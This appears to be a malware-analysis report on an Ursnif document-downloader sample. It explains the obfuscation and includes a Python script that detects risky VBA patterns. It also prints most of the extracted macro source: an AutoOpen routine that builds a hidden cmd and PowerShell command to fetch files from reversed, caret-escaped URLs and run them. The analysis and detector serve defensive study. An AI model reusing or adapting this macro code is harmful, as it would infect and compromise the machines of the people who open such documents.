Verdict: MALICIOUS (Risk Score 202)
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1566.001 Spearphishing Attachment
ClamAV identifies the sample with the signature Doc.Downloader.URSNIF-6729855-3, which attributes it to the Ursnif document-downloader family. The recovered VBA project contains an AutoOpen subroutine, which runs as soon as the document is opened with macros enabled, and whose only real action is a call to VBA.Shell with the window style written as 90 - 90, i.e. 0 (vbHide), so the spawned process has no visible window. The command line is never present in clear text: it is assembled at run time by concatenating the return values of several helper functions (JkFiCRjZjl, MHAjazjW, RLNtWBmEB, mdomADcRM, PhBInhEcbUwB and others), each of which builds its piece from short string literals and Chr() arithmetic (Chr(4 + 1 + 3 + 0 + 26) is Chr(34), a double quote). The Hour calls on random strings scattered between the assignments are padding: their results are discarded and the type-mismatch errors they raise are swallowed by On Error Resume Next, which every routine begins with, split over four lines with line continuations. The fragments that are visible show cmd.exe caret escaping (the first reads cmd /V^:^O/C once joined, i.e. a cmd /V delayed-expansion invocation) around reversed text: "}}^{hct^ac^" is catch{}} backwards, "e^l^iF" + "d^a^o" and "ln^woD" are pieces of DownloadFile reversed, "^m^e^t^I^-^e" + "^kovnI" reverses to Invoke-Item, and ":^p^t^th@^" reverses to @http:, matching the ".Split('@')" fragment that splits an '@'-separated list of URLs. Taken together this is consistent with the signature: a cmd-to-PowerShell downloader that tries several URLs and executes what it fetches. The preview is truncated, so the final command and the actual URLs are not recoverable from this page.
Heuristics (6)
- ClamAV: Doc.Downloader.URSNIF-6729855-3 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.URSNIF-6729855-3.
- VBA macros detected (medium, OLE_VBA_MACROS, 2 related findings): document contains VBA macro code.
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA. Here it is the qualified form VBA.Shell inside AutoOpen, with window style 90 - 90 = 0, so the child process runs with a hidden window.
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro, i.e. code that runs automatically when the document is opened with macros enabled.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. Note that for this sample the "no modern VBA project was recovered" part of that description is contradicted by the extracted macros.bas below; the OLE_VBA_* findings are the operative ones and this marker adds no independent evidence.
- Embedded URL (info, EMBEDDED_URL): one or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main, in document text (OLE body). This is the DrawingML XML namespace identifier found in any document with drawing markup and is not a network indicator; the download URLs appear to be among the reversed, caret-escaped macro fragments and are not extracted by this pass.
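The three VBA findings above (macros present, AutoOpen entry point, Shell call) are the kind of keyword triage that olevba's analysis mode produces. The block below is an added example written for this page, not the analyzer's or olevba's code; it runs a few rules of that shape over a constructed excerpt modelled on the macros.bas preview and demonstrates two details this sample forces a rule writer to handle: the macro splits On Error Resume Next over four lines with VBA line continuations, so a per-line grep misses it unless continuations are joined first, and the Shell call is written in the qualified form VBA.Shell, which a pattern anchored on a bare Shell( would miss. The finding names OLE_VBA_AUTOOPEN and OLE_VBA_SHELL mirror the report; the patterns and the third rule name are this example's own.

```python
import re

# Constructed excerpt in the style of the macros.bas preview (not the full
# sample): the AutoOpen entry point, the split "On Error Resume Next", a junk
# Hour call and the qualified VBA.Shell call with a hidden window style.
MACRO_SRC = r'''Attribute VB_Name = "tiISCCF"
Sub AutoOpen()
On _
Error _
Resume _
Next
Hour "52057065" + "Q"
VBA.Shell CleanString(D) + DThRUiNwfoqBSO + EwTKlmnskQ, 90 - 90
End Sub
'''

# (finding, severity, pattern). The first two names mirror the report's findings;
# the regexes and the third rule are this example's own, not the analyzer's.
RULES = [
    ("OLE_VBA_AUTOOPEN", "high",
     r"^\s*(?:Public\s+|Private\s+)?Sub\s+"
     r"(?:AutoOpen|Auto_Open|AutoExec|Document_Open|Workbook_Open)\s*\("),
    ("OLE_VBA_SHELL", "critical",
     # optional VBA./Interaction. qualifier, then '(' or an argument; the
     # lookbehind stops e.g. "CleanShell(" from matching
     r"(?<![\w.])(?:VBA\.|Interaction\.)?Shell\s*[\(\s]"),
    ("EXAMPLE_ON_ERROR_RESUME_NEXT", "medium",
     r"\bOn\s+Error\s+Resume\s+Next\b"),
]


def normalize(src):
    """Join VBA line continuations (' _' at end of line) so keywords split
    across lines, like the four-line On Error Resume Next above, can match."""
    return re.sub(r"[ \t]_[ \t]*\r?\n", " ", src)


def triage(src):
    """Return [(finding, severity, matched text)] over the joined source."""
    text = normalize(src)
    hits = []
    for name, sev, pat in RULES:
        for m in re.finditer(pat, text, re.I | re.M):
            hits.append((name, sev, m.group(0).strip()))
    return hits


def verdict(hits):
    """Overall label is the highest severity seen, 'clean' if nothing matched."""
    order = ["info", "medium", "high", "critical"]
    return max((h[1] for h in hits), key=order.index, default="clean")


if __name__ == "__main__":
    found = triage(MACRO_SRC)
    for name, sev, text in found:
        print(f"{sev:8} {name:30} {text}")
    print("verdict:", verdict(found))
```

Without normalize() the third rule never fires on this source, because the keyword sequence only exists once the continuation lines are joined; real olevba handles this for you, but a homegrown YARA-style rule on the raw text does not.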
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5535 bytes | b221688fd929cf62b4f2b703eaf571bec2b09dc33f29d0315a1f482cd5b8c97b |
Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "tiISCCF"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On _
Error _
Resume _
Next
Hour "52057065" + "Q"
VBA.Shell CleanString(D) + DThRUiNwfoqBSO + EwTKlmnskQ + JkFiCRjZjl + MHAjazjW + RLNtWBmEB + mdomADcRM + PhBInhEcbUwB, 90 - 90
Hour "HbR" + "c" + "275967288" + "izL"
Hour "qzqchCT" + "230210106" + "LlXvcDlqGndD" + "3793"
Hour "hMRfphE" + "164837862" + "7005" + "w"
Hour "A" + "AP"
End Sub
Attribute VB_Name = "DoapfFdmjdBQV"
Function JkFiCRjZjl()
On _
Error _
Resume _
Next
Hour "Hb" + "U"
Hour "6963" + "159261378" + "489319301" + "RHqP"
Hour "PqmrVsujApHUIX" + "JHrUAZq" + "Bhbc" + "231920472"
Hour "ni" + "woO" + "6910" + "940"
Hour "zvkXn" + "hJfp"
vAVsTDw = "c" + "md /V^:" + "^O/C" + Chr(4 + 1 + 3 + 0 + 26) + "^s" + "e^t " + "0"
Hour "rmawUtZInPPQVY" + "5033"
lwPww = "^" + "J^7X=^" + " " + "^ ^ ^ " + "^ ^ ^ " + " " + " ^"
Hour "390398003" + "117075038"
Hour "uYYTlJ" + "1538" + "9111" + "824"
lXQAEsNtS = " " + "^ ^" + " }}^{" + "hct^ac^" + "}^;k" + "^a^" + "er^b^;N" + "Nz$"
Hour "865" + "RVR"
Hour "2272" + "204513242"
Hour "RNNSLMStF" + "faTjdGcfjNi"
Hour "tN" + "AR"
LkwdTM = "^ " + "^" + "m^e^t" + "^I" + "^-^e" + "^kovnI" + "^" + ";)NN"
Hour "NrHGXriCoVoZba" + "1436"
Hour "270745301" + "zLtlrTClSjC" + "PY" + "YSiMcYX"
Hour "323976619" + "zdZJrVF" + "ALwumjFu" + "VnqoUnPh"
Hour "395551624" + "PwztGj"
cwwjFwGBmcL = "^z$ ^," + "^ZY" + "^k^$(^" + "e^l^iF" + "^" + "d" + "^a^o"
Hour "432753973" + "3929"
Hour "229398751" + "WSiv"
Hour "v" + "qPb"
Hour "NVNacIoN" + "3688" + "tuwbNMDcsmicR" + "DjsvcpJbbOM"
cAuwcia = "ln^" + "woD" + "^" + "." + "t^Xn^$^"
Hour "XkRS" + "OmhFFZ" + "m" + "8155"
Hour "6058" + "334372556"
Hour "pdYQ" + "iJqj"
toBzmcj = "{yrt{)^" + "Ts^b" + "$^ ni" + " ^Z^" + "Y^k$" + "(^hc" + "a^ero^" + "f;^'^e^" + "x^e.^'" + "+i" + "r^O^"
Hour "2039" + "p"
Hour "hPVljf" + "hzHs"
Hour "381166827" + "OfUrS"
Hour "scU" + "FWmz" + "2594" + "vfwofiRkUPdI"
JbTTwvHsjs = "$" + "+'^\'^" + "+" + "ci^l^" + "b" + "u^"
Hour "P" + "G" + "hb" + "tCBwn"
Hour "176420213" + "jRswC"
Hour "iqOHYfj" + "db" + "125820239" + "OjNz"
Hour "259" + "JslCGiJ"
Hour "6085" + "Zq" + "CPBOUjbitaoW" + "429593035"
Hour "8412" + "2351" + "145460884" + "RIN"
TUdZQj = "p^:vne" + "^$=NN^z" + "$^;" + "^" + "'^6" + "86^" + "'^ " + "= " + "^irO" + "$^"
Hour "PYTFNCWbmmLUqG" + "372711180"
Hour "5467" + "aD"
Hour "50453008" + "zWwWitTvLvLcpu" + "jbM" + "P"
Hour "9005" + "6857" + "j" + "oRuirLvPE"
VbnRuGOJtC = ";)" + "^'@^'(t" + "i^l" + "^p^S^" + ".'^" + "pH^" + "I" + "^ge" + "t/m^oc" + "^.r"
JkFiCRjZjl = vAVsTDw + lwPww + lXQAEsNtS + LkwdTM + cwwjFwGBmcL + cAuwcia + toBzmcj + JbTTwvHsjs + TUdZQj + VbnRuGOJtC
Hour "3139" + "204602433" + "KcwE" + "243985527"
Hour "7670" + "PbrMpqpIN" + "H" + "2430"
Hour "131024552" + "j"
Hour "vvrSNWH" + "475445553"
Hour "9712" + "270931338"
End Function
Function MHAjazjW()
On _
Error _
Resume _
Next
Hour "2934" + "nWkddRawaiukiS" + "fwwI" + "GmvT"
Hour "MUIsjCB" + "KMV" + "7826" + "484824836"
Hour "npdwBfWmH" + "sSaG" + "6992" + "ZmlNIwjphMPMZr"
kcifJDTYzU = "cn" + "ur^ei" + "b" + "m^o^z//" + "^"
Hour "337893607" + "chPN"
Hour "412647174" + "48957467" + "1845" + "izd"
Hour "136933561" + "133101979" + "Yn" + "VCMjzK"
jhBAdWwdjz = ":^p^t" + "^th@^" + "t/moc^." + "^m^e^" + "t" + "^isoke/" + "/:p"
Hour "403256899" + "GNbn"
Hour "DAwllS" + "343068337"
Hour "16387065" + "NEKEwuCY"
wSCHknmmCpM = "^t^" + "th" + "^@pe9" + "ID" + "^IbN/^" + "m^oc.si" + "drap"
Hour "tKNLBQ" + "oPal" + "9450" + "qvwQA"
adbsq = "e" + "dh^" + "am/" + "/" + "^:" + "^p^t^" + "th@SC^Q" + "^F/g" + "ro.^"
Hour "rsZ" + "bpFGvfijB" + "r" + "277521976"
QfVEhjMBdWL = "s^" + "01r^u^" + "hsame" + "s//^:
... (truncated)